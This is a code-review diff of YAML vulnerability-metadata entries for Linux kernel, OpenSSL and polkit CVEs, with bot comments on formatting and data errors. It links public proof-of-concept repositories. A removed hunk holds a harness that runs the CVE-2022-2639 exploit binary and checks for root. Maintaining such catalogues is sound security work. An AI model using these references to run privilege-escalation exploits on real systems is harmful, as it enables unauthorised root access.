- https://nvd.nist.gov/vuln/detail/CVE-2022-1015
|
||||
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e1acfa387b9ff82cfc7db8cc3b6959221a95851
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H
|
||||
cvss-score: 6.6
|
||||
cve-id: CVE-2022-1015
|
||||
cwe-id: CWE-787
|
||||
tags: cve2022,权限提升
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2022, 权限提升
|
|
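Review bot: `severity: Medium` is capitalized here, while other entries touched by this diff keep lowercase values (`severity: high`, `severity: medium`). Anything that compares the field as a string will treat these as different values, so please pick one casing and apply it across the merge. The downgrade from high itself is consistent with the unchanged `cvss-score: 6.6`.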
@ -16,4 +16,5 @@ info:
|
|||
cve-id: CVE-2022-1679
|
||||
cwe-id: CWE-416
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 权限提升, cve2022
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
由于 Linux 内核的 BPF 验证器存在一个空指针漏洞,没有对 *_OR_NULL 指针类型进行限制,允许这些类型进行指针运算。攻击者可利用该漏洞在获得低权限的情况下,构造恶意数据执行空指针引用攻击,最终获取服务器 root 权限
|
||||
scope-of-influence:
|
||||
Linux kernel(>=5.8 && <=5.16)
|
||||
5.8 ≤ Linux kernel ≤ 5.16
|
||||
reference:
|
||||
- https://www.openwall.com/lists/oss-security/2022/06/04/3
|
||||
- https://security.netapp.com/advisory/ntap-20220217-0002/
|
||||
|
@ -17,4 +17,4 @@ info:
|
|||
cwe-id: CWE-476
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2022,权限提升
|
||||
tags: cve2022, 权限提升
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
由于Linux kernel中存在资源管理错误漏洞,当kernel/ucount.c(非特权时)启用非特权用户命名空间时,允许释放后继续使用和特权升级,因为ucounts对象的寿命可以比其命名空间长。
|
||||
scope-of-influence:
|
||||
Linux kernel(>=5.14 && <=5.16.4)
|
||||
5.14 ≤ Linux kernel ≤ 5.16.4
|
||||
reference:
|
||||
- https://ubuntu.com/security/CVE-2022-24122
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24122
|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2022-25258
|
||||
source:
|
||||
https://github.com/szymonh/d-os-descriptor
|
||||
source: https://github.com/szymonh/d-os-descriptor
|
||||
info:
|
||||
name: Linux kernel是Linux操作系统的主要组件,也是计算机硬件与其进程之间的核心接口。它负责两者之间的通信,还要尽可能高效地管理资源。Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用。
|
||||
severity: medium
|
||||
|
|
|
@ -10,10 +10,10 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2022-25265
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-25265
|
||||
cwe-id: CWE-913
|
||||
cnvd-id: none
|
||||
kve-id: none
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: Linux kernel, 内存损坏
|
|
@ -14,5 +14,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-25636
|
||||
cnvd-id: CNNVD-202202-1743
|
||||
tags: 堆越界,权限提升,cve2022
|
||||
cwe-id: CWE-269
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 堆越界, 权限提升, cve2022
|
||||
|
|
|
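Review bot: replacing `cnvd-id: CNNVD-202202-1743` with `cnvd-id: None` discards the identifier instead of relocating it. A CNNVD number under a `cnvd-id` key was mislabelled, but the value is still useful for cross-referencing. Suggest keeping it, for example as a cnnvd.org.cn search link under `reference:` in the form other entries in this diff already use.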
@ -25,5 +25,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 6.7
|
||||
cve-id: CVE-2022-2586
|
||||
cnvd-id: NONE
|
||||
cwe-id: None
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: netfilter, cve2022
|
|
@ -15,6 +15,6 @@ info:
|
|||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-2588
|
||||
cwe-id: CWE-416
|
||||
cnvd-id:
|
||||
kve-id:
|
||||
tags: UAF,拒绝服务,权限提升,cve2022
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: UAF, 拒绝服务, 权限提升, cve2022
|
|
@ -1,19 +0,0 @@
|
|||
id: CVE-2022-2602
|
||||
source: https://seclists.org/oss-sec/2022/q4/57
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: high
|
||||
description: |
|
||||
io_uring UAF, Unix SCM garbage collection
|
||||
scope-of-influence:
|
||||
Linux kernel < 5.10.149-1
|
||||
reference:
|
||||
- https://ubuntu.com/security/CVE-2022-2602
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1
|
||||
cvss-score: 漏洞评分
|
||||
cve-id: CVE-2022-2602
|
||||
cwe-id: None
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2022,UAF
|
|
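Review bot: the whole CVE-2022-2602 entry is removed (-1,19 +0,0) with no stated reason, and the two whole-file deletions earlier in the diff (-1,6 +0,0 for the reproduction notes and -1,174 +0,0 for the C source) are equally unexplained. The deleted YAML still carried template placeholders (`cvss-metrics: CVSS:3.1`, `cvss-score: 漏洞评分`), so if incompleteness is the reason, say so in the commit message, or fill the fields in and keep the entry. A silent removal in a formatting cleanup is easy to miss in review.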
@ -1,48 +1,20 @@
|
|||
FormatVer: 20220411
|
||||
Id: CVE-2022-2639
|
||||
Belong: kernel
|
||||
PocHazardLevel: low
|
||||
Source: https://github.com/avboy1337/CVE-2022-2639-PipeVersion
|
||||
SiteInfo:
|
||||
Name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核
|
||||
Severity: high
|
||||
Description:
|
||||
id: CVE-2022-2639
|
||||
source: https://github.com/avboy1337/CVE-2022-2639-PipeVersion
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核
|
||||
severity: high
|
||||
description:
|
||||
由于 openvswitch模块中reserve_sfa_size()函数在使用过程中存在缺陷,导致本地经过身份认证的攻击者可以利用漏洞提升至root权限
|
||||
ScopeOfInfluence:
|
||||
kernel(>=3.13 && <5.18)
|
||||
References:
|
||||
scopeOfInfluence:
|
||||
3.13 ≤ Linux-Kernel < 5.18
|
||||
references:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-2639
|
||||
- https://github.com/torvalds/linux/commit/cefa91b2332d7009bc0be5d951d6cbbf349f90f8
|
||||
SiteClassification:
|
||||
CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
CvssScore: 7.8
|
||||
CveId: CVE-2022-2639
|
||||
CweId: None
|
||||
CnvdId: None
|
||||
KveId: None
|
||||
Tags:
|
||||
- ve2022
|
||||
- 权限提升
|
||||
SiteRequests:
|
||||
Implement:
|
||||
ImArray:
|
||||
- Exec : "CVE-2022-2639_x86_64"
|
||||
Args :
|
||||
ExpireTime: 30 #second
|
||||
|
||||
# < input
|
||||
# > output
|
||||
# . wait
|
||||
# ? condition
|
||||
# : content
|
||||
#
|
||||
#组合起来
|
||||
# >. 等待直到输出
|
||||
# << 输入字符
|
||||
# >?判断条件
|
||||
Inter:
|
||||
- ">.:infinitely ..." #等待输出'infinitely ...'
|
||||
- "<<:id\n" #输入'id\n'
|
||||
- ">.:\n" #等待输出'\n'
|
||||
- ">?:uid=0(root)" #判断输出为'uid=0(root)'为成功
|
||||
Condition: None
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-2639
|
||||
cwe-id: CWE-171, CWE-787, CWE-192
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2022, 权限提升
|
|
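Review bot: the rewritten entry introduces `scopeOfInfluence:` and `references:`, but every other entry in this diff uses `scope-of-influence:` and `reference:`. A consumer that reads the hyphenated, singular keys will find neither field on CVE-2022-2639. Please rename both keys to match. For consistency with the other entries, `description:` could also take the `|` block-scalar marker.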
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
Linux kernel 5.16.15之前版本存在安全漏洞,该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。
|
||||
scope-of-influence:
|
||||
~ linux kernel 5.17-rc5
|
||||
linux kernel < 5.17-rc5
|
||||
reference:
|
||||
- https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15
|
||||
- https://www.debian.org/security/2022/dsa-5173
|
||||
|
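Review bot: the new bound `linux kernel < 5.17-rc5` does not line up with the unchanged description and reference in this hunk, which place the fix at 5.16.15 ("5.16.15之前版本", ChangeLog-5.16.15). If both the mainline and the stable bound are intended, state both; otherwise use the one the description gives. The product name is also lowercase here, while other scope lines in this diff use `Linux-Kernel` or `Linux kernel`.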
@ -15,4 +15,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-27666
|
||||
tags: 缓冲区溢出,权限提升,cve2022
|
||||
cwe-id: CWE-787
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 缓冲区溢出, 权限提升, cve2022
|
|
@ -14,5 +14,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-32250
|
||||
cnvd-id: CNNVD-202206-407
|
||||
tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022
|
||||
cwe-id: CWE-416
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: Linux Kernel, cve2022
|
||||
|
|
|
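Review bot: the new `tags: Linux Kernel, cve2022` names the product rather than the bug class, even though `cwe-id: CWE-416` is added in the same hunk. Other entries in this diff tag the class (for example `UAF` on CVE-2022-2588), so a class tag would keep tag-based filtering useful. The hunk also drops `CNNVD-202206-407` outright; consider moving it under `reference:` instead of discarding it.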
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
Linux kernel 5.18.9版本及之前版本存在安全漏洞,该漏洞源于。本地攻击者利用该漏洞使用 nft_set_elem_init 中的类型混淆错误(导致缓冲区溢出)来提升权限。
|
||||
scope-of-influence:
|
||||
Linux kernel(>=5.8.0 && <=5.18.9)
|
||||
5.8.0 ≤ Linux kernel ≤ 5.18.9
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34918
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-34918
|
||||
|
|
|
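Review bot: the description on the context line just above the changed scope still contains an empty clause, "该漏洞源于。" ("the vulnerability stems from" followed by nothing). Since this entry is being edited anyway, either complete the clause or delete it, so the sentence reads straight through to the `nft_set_elem_init` type-confusion explanation that follows.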
@ -1,18 +1,21 @@
|
|||
id: CVE-2022-36946
|
||||
source: https://github.com/Pwnzer0tt1/CVE-2022-36946
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: 高危
|
||||
description: |
|
||||
Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。
|
||||
scope-of-influence:
|
||||
5.18.14
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-36946
|
||||
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-36946
|
||||
tags: 拒绝服务,cve2022
|
||||
id: CVE-2022-36946
|
||||
source: https://github.com/Pwnzer0tt1/CVE-2022-36946
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: High
|
||||
description: |
|
||||
Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。
|
||||
scope-of-influence:
|
||||
Linux-Kernel = 5.18.14
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-36946
|
||||
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-36946
|
||||
cwe-id: None
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 拒绝服务, cve2022
|
|
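Review bot: the git.kernel.org reference carried over into the rewritten entry points at commit `722d94847de29310e8aa03fcbdb41fc92c521756`, the same commit id the CVE-2022-0185 entry in this diff lists as its fix. One commit is unlikely to fix both `legacy_parse_param` and `nfqnl_mangle`, so this looks like a copy-paste leftover. Since the whole file is rewritten here (-1,18 +1,21), please replace it with the nfnetlink_queue fix commit or drop the line.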
@ -6,11 +6,11 @@ info:
|
|||
description: |
|
||||
在5.19.10之前的Linux内核中的drivers/media/dvb-core/dmxdev.c中,存在由refcount竞争导致的释放后使用,影响dvb_demux_open和dvb_dmxdev_release。
|
||||
scope-of-influence:
|
||||
Linux内核5.19.10之前的所有版本
|
||||
Linux-Kernel < 5.19.10
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2022-41218
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 5.5
|
||||
cve-id: CVE-2022-41218
|
||||
cwe-id: CWE-416
|
||||
|
|
|
@ -2,17 +2,18 @@ id: CVE-2023-0045
|
|||
source: https://github.com/es0j/CVE-2023-0045
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: 超危
|
||||
severity: High
|
||||
description: Linux kernel存在安全漏洞,该漏洞源于绕过Spectre-BTI用户空间缓解措施。基于linux操作系统的Intel、AMD和 Arm 等现代处理器,被发现存在一个漏洞,攻击者可以绕过现有硬件防护缓解措施,实施Spectre BTI推测执行攻击,从而访问内存数据,可能引起信息泄漏。用于推测控制的prctl系统调用的当前实现未能保护用户免受在缓解之前执行的攻击者的攻击。seccomp缓解在此场景中也失败了。
|
||||
scope-of-influence:
|
||||
5.5~5.15
|
||||
5.5 ≤ Linux-Kernel ≤ 5.15
|
||||
reference:
|
||||
- https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2023-0179
|
||||
- https://docs.kernel.org/userspace-api/spec_ctrl.html
|
||||
- https://elixir.bootlin.com/linux/v5.15.56/source/arch/x86/kernel/cpu/bugs.c#L1467
|
||||
- https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2023-0045
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-0045
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2023-0045
|
||||
cwe-id:
|
||||
tags: 推测攻击,信息泄露,cve2023
|
||||
cwe-id: CWE-610
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 推测攻击, 信息泄露, cve2023
|
|
@ -19,5 +19,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2023-0179
|
||||
cnvd-id: NONE
|
||||
tags: 缓冲区溢出,cve2023
|
||||
cwe-id: CWE-190
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 缓冲区溢出, cve2023
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2016-2107
|
||||
source:
|
||||
https://github.com/FiloSottile/CVE-2016-2107
|
||||
source: https://github.com/FiloSottile/CVE-2016-2107
|
||||
info:
|
||||
name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。
|
||||
severity: medium
|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2021-3449
|
||||
source:
|
||||
https://github.com/terorie/cve-2021-3449
|
||||
source: https://github.com/terorie/cve-2021-3449
|
||||
info:
|
||||
name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。
|
||||
severity: medium
|
||||
|
|
|
@ -4,11 +4,12 @@ info:
|
|||
name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。
|
||||
severity: High
|
||||
description: 漏洞出自BN_mod_sqrt()接口函数,它用于计算模平方根,且期望参数p应该是个质数,但是函数内并没有进行检查,这导致内部可能出现无限循环。
|
||||
scope-of-influence: Openssl 1.0.2, 1.1.1 和 3.0 版本
|
||||
scope-of-influence:
|
||||
Openssl 1.0.2, 1.1.1 和 3.0 版本
|
||||
reference:
|
||||
- https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-0778
|
||||
cwe-id: CWE-835
|
||||
|
|
|
@ -19,4 +19,4 @@ info:
|
|||
cwe-id: CWE-787
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 拒绝服务,DoS,cve2022,RCE,远程代码执行
|
||||
tags: 拒绝服务, DoS, cve2022, RCE, 远程代码执行
|
|
@ -24,4 +24,4 @@ info:
|
|||
cwe-id: CWE-120
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 缓存溢出,BOF,拒绝服务,DoS,cve2022,RCE,远程代码执行
|
||||
tags: 缓存溢出, BOF, 拒绝服务, DoS, cve2022, RCE, 远程代码执行
|
|
@ -18,4 +18,4 @@ info:
|
|||
cwe-id: CWE-415
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 拒绝服务,DoS
|
||||
tags: 拒绝服务, DoS
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
发现polkit可能被欺骗,绕过D-Bus请求的凭据检查,将请求者的权限提升到root用户。
|
||||
scope-of-influence:
|
||||
0.105 ≥ policykit ≥ 0.113
|
||||
0.105 ≤ policykit ≤ 0.113
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3560
|
||||
- https://ubuntu.com/security/CVE-2021-3560
|
||||
|
@ -14,7 +14,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-3560
|
||||
cwe-id: CWE-754,CWE-863
|
||||
cwe-id: CWE-754, CWE-863
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021,权限提升
|
||||
tags: cve2021, 权限提升
|
|
@ -14,7 +14,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-4034
|
||||
cwe-id: CWE-787,CWE-125
|
||||
cwe-id: CWE-787, CWE-125
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021,权限提升
|
||||
tags: cve2021, 权限提升
|
Some files were not shown because too many files have changed in this diff